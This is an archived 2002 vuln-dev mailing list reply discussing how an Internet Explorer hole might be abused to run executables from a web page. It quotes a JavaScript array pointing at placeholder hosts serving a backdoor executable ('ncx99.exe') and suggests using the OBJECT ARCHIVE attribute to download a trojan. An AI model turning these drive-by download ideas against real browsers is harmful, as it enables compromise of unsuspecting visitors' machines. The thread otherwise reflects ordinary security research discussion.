Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: Joerg Over <over () dexia de>
Date: Fri, 15 Mar 2002 10:27:34 +0100
Hello ...

What about, generally, not tackling the programName array trying to stuff
params into it, but the <OBJECT> instead?

At 17:48 14.03.02 -0500 you wrote:
->Another thought... will this bug run an executable from a web page? If 
->so you could just make your own binary to do whatever you wanted. Like 
->http://mysiteathome.com/malware.exe or something along those lines. I 
->would HOPE that it asks to save the file to disk or even better ignore 
->it all together. Maybe try something like:
->
->var programName=new Array(
->    'http://mysiteathome.com/ncx99.exe&apos;,
->    'http://someothersite.com/ncx99.exe&apos;,
->);


One could maybe try the <PARAM NAME=> - tag to pass parameters. Dunno how
that's transported to the object, though.
Another attempt might be using the ARCHIVE - attribute of the OBJECT to
download the trojan (or batchfile if you will, like has been proposed
here), so you don't need params.


greetings, -jo
Previous By Date Next
Previous By Thread Next

Current thread: